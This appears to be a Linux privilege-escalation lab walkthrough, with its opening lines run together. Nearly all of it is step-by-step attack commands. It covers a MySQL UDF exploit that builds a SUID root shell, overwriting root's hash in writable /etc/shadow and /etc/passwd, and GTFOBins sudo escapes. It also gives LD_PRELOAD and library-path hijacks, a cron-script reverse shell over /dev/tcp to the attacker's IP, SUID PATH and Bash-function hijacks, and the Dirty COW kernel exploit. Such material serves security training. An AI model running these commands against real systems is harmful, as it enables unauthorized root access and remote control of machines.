cd /home/user/tools/mysql-udfgcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lcmysql -u rootuse mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');exit/tmp/rootbash -prm /tmp/rootbash
exitls -l /etc/shadowcat /etc/shadowjohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txtsudo suEnsure the shadow file is writable:
ls -l /etc/shadowTo create a password hash with your chosen password, use the following command:
mkpasswd -m (hashing algorithm) newpassFor example, to use SHA-512, the command would be:
mkpasswd -m sha-512 newpass- Open the shadow file with elevated privileges using a text editor like
nanoorvi:
nano /etc/shadow- Find the root entry in the shadow file.
- Replace the old hash with your newly generated password hash.
After replacing the password hash, escalate your privileges with:
sudo suFirst, verify that the /etc/passwd file is world-writable:
ls -l /etc/passwdLook for a w in the third section of the file permissions (e.g., -rw-rw-rw-).
Generate a new password hash for a password of your choice using the openssl command:
openssl passwd newpasswordhereThis will output a hashed password that you can use in the next step.
Open the /etc/passwd file using a text editor like nano:
nano /etc/passwd-
Replace the Root User's Password Hash:
Find the root user's row (the first row in the file) and replace the x between the first and second colon (:) with the newly generated password hash.Before:
root:x:0:0:root:/root:/bin/bashAfter:
root:$6$abcde$hashgoeshere:0:0:root:/root:/bin/bash
use the new password to switch to the root user:
su rootOpen your terminal and run the following command to list the allowed sudo commands for your user:
sudo -lThis command displays all programs you are allowed to run with sudo. Example output:
User user may run the following commands on this host:
(ALL) NOPASSWD: /usr/bin/nmap
(ALL) NOPASSWD: /bin/bash
(ALL) NOPASSWD: /usr/bin/vim
(ALL) NOPASSWD: /usr/bin/findHead over to GTFOBins and search for each program that appeared in your sudo -l output. This website lists binaries that can be exploited to escalate privileges.
Search for each program listed in your sudo -l output such as nmap, bash, vim, etc., on GTFOBins.
For every exploitable program you find on GTFOBins, follow the instructions provided on the website to perform privilege escalation.
If nmap is listed in sudo -l:
- Visit the nmap page on GTFOBins.
- Follow these Sudo instructions:
sudo nmap --interactive
- Once inside the interactive prompt, type:
This will spawn a root shell.
!sh
If bash is listed in sudo -l, follow these steps:
- Visit the bash page on GTFOBins.
- Run the command:
This will directly give you a root shell.
sudo bash
If vim appears in your sudo -l output, follow these steps:
- Visit the vim page on GTFOBins.
- Use the following command:
This will drop you into a root shell within the
sudo vim -c ':!sh'vimeditor.
If find is listed:
- Visit the find page on GTFOBins.
- Run the following:
This will spawn a root shell using the
sudo find . -exec /bin/sh \; -quit
findcommand.
After executing the GTFOBins instructions, verify that youโve escalated privileges successfully by running:
whoamiIf the output is root, youโve successfully gained root access!
Search each program listed by sudo -l on GTFOBins and follow the steps provided to see if you can exploit them for privilege escalation.
By following this process, you can methodically exploit allowed binaries and gain root access on your system!
First, identify which programs you are allowed to run with sudo by executing:
sudo -lThis will give you a list of programs that can be run without a password.
Next, compile the malicious shared object using the provided code (preload.c). Run this command:
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.cThis will create the preload.so file in the /tmp directory, ready to be loaded into a privileged process.
Now, execute one of the programs from the sudo -l list while setting the LD_PRELOAD environment variable to your malicious shared object:
sudo LD_PRELOAD=/tmp/preload.so program-name-hereReplace program-name-here with the actual program name from your sudo -l output. This should allow you to escalate privileges and gain control over the target process.
To check which shared libraries are used by Apache2, run the following command:
ldd /usr/sbin/apache2This will list all the shared libraries that Apache2 relies on, including the paths to those libraries.
From the libraries listed, let's create a malicious shared object with the same name as libcrypt.so.1 using the provided exploit code library_path.c.
To compile the malicious shared object, run:
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.cThis command compiles the code and outputs a shared object called libcrypt.so.1 into the /tmp directory.
Now, execute Apache2 using sudo while specifying the LD_LIBRARY_PATH environment variable to point to the directory where your malicious shared object (/tmp) is stored:
sudo LD_LIBRARY_PATH=/tmp apache2By doing this, Apache2 will load your malicious shared object instead of the legitimate one, potentially allowing you to exploit the system.
Check the system-wide crontab to identify scheduled tasks:
cat /etc/crontabThis command displays the system's cron jobs, which can help you find automated tasks that may run overwrite.sh.
To find the exact location of overwrite.sh, use:
locate overwrite.shThis command will return the full path of the file so you can modify it.
Edit the file to insert the following reverse shell code:
#!/bin/bash
bash -i >& /dev/tcp/your-ip/listen-port 0>&1Replace your-ip with your attacker's IP address and listen-port with the port you're listening on (e.g., 4444).
In a new terminal tab, set up a listener with Netcat to catch the reverse shell:
nc -nvlp 4444This will open port 4444 and wait for incoming connections from the reverse shell.
Once the cron job runs the overwrite.sh script, it should execute the reverse shell, connecting back to your Netcat listener.
Run the following command to find files with SUID/SGID bits set:
find / -type f \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullCheck if the found SUID/SGID files are essential or pose a risk:
- Common safe files:
/bin/passwd,/usr/bin/sudo,/bin/su. - Investigate: Custom, old, or rarely used binaries.
Use these tools to search for exploits related to each SUID/SGID file:
-
Exploit-DB: Search for the binary name.
-
GTFOBins: Search for the binary to see known exploitation techniques.
Run the vulnerable SUID program to observe its current behavior:
/usr/local/bin/suid-soYou will see that it displays a progress bar before exiting.
Run strace to inspect the system calls made by the program, specifically looking for missing files like shared objects:
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"Youโll notice it tries to load a shared object from your home directory:
/home/user/.config/libcalc.so, but this file does not exist.
Since the program expects the .so file in a non-existent directory, create the directory:
mkdir /home/user/.configThere is an example shared object code available at /home/user/tools/suid/libcalc.c that spawns a Bash shell. Compile it into the required shared object:
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.cNow, run the vulnerable SUID program again:
/usr/local/bin/suid-soThis time, instead of the progress bar, you will gain a root shell.
Run the vulnerable SUID program to see what it does:
/usr/local/bin/suid-envYou'll notice it tries to start the apache2 web server.
Run the strings command on the executable to view readable text within the binary:
strings /usr/local/bin/suid-envIn the output, you'll see a line like this:
service apache2 startThis indicates that the program tries to call the service command, but it does not use the full path (/usr/sbin/service).
To exploit the missing absolute path, compile a malicious service program that spawns a Bash shell. The source code is located at /home/user/tools/suid/service.c. Compile it into an executable called service:
gcc -o service /home/user/tools/suid/service.cPrepend the current directory (.) to the PATH environment variable so that your malicious service executable is executed instead of the legitimate one:
PATH=.:$PATH /usr/local/bin/suid-envAfter running the command, the SUID program will execute your custom service binary, and you'll gain a root shell.
Use strings to check the content of the /usr/local/bin/suid-env2 binary and confirm that it uses the absolute path for the service command:
strings /usr/local/bin/suid-env2You should see that it calls /usr/sbin/service to start the apache2 web server.
Ensure the installed version of Bash on your system is less than 4.2-048. This vulnerability exists in older Bash versions, where shell functions can override executables:
/bin/bash --versionIf the version is below 4.2-048, you can proceed with the exploit.
Create a Bash function named /usr/sbin/service that spawns a privileged Bash shell (-p to preserve permissions). Export this function so that the SUID program uses it instead of the real /usr/sbin/service:
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/serviceNow, execute the /usr/local/bin/suid-env2 program:
/usr/local/bin/suid-env2Instead of starting the actual apache2 web server, your exported Bash function will be executed, giving you a root shell.
You can take advantage of Bashโs debugging mode by setting the PS4 environment variable to execute a command. In this case, it will copy /bin/bash to /tmp/rootbash and set the SUID bit on it to give root privileges. Use the following command:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2env -i: Clears the environment variables.SHELLOPTS=xtrace: Enables Bash tracing, printing each command before execution.PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)': This sets the command to be executed when a line is traced./usr/local/bin/suid-env2: The vulnerable SUID executable.
This command creates a SUID copy of /bin/bash named rootbash in the /tmp directory.
After running the above command, the /tmp/rootbash executable will be created with SUID privileges.
Now, execute the SUID rootbash with the -p option to preserve elevated privileges and gain a root shell:
/tmp/rootbash -pNote: This method does not work on Bash versions 4.4 and above due to changes in how PS4 is handled in newer versions of Bash.
Use the Linux Exploit Suggester 2 tool to identify potential kernel exploits, including Dirty COW:
perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.plCheck the output to confirm if Dirty COW is listed as a possible exploit for the kernel.
The exploit code for Dirty COW is located at /home/user/tools/kernel-exploits/dirtycow/c0w.c. Compile the code using gcc:
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w-pthread: This flag enables multi-threading, which is required for the exploit.
Execute the compiled Dirty COW exploit. This exploit will replace the SUID file /usr/bin/passwd with a modified version that spawns a root shell. A backup of the original /usr/bin/passwd is saved to /tmp/bak.
./c0wNote: The exploit may take a few minutes to complete.
Once the exploit has completed, execute the modified passwd command to gain a root shell:
/usr/bin/passwd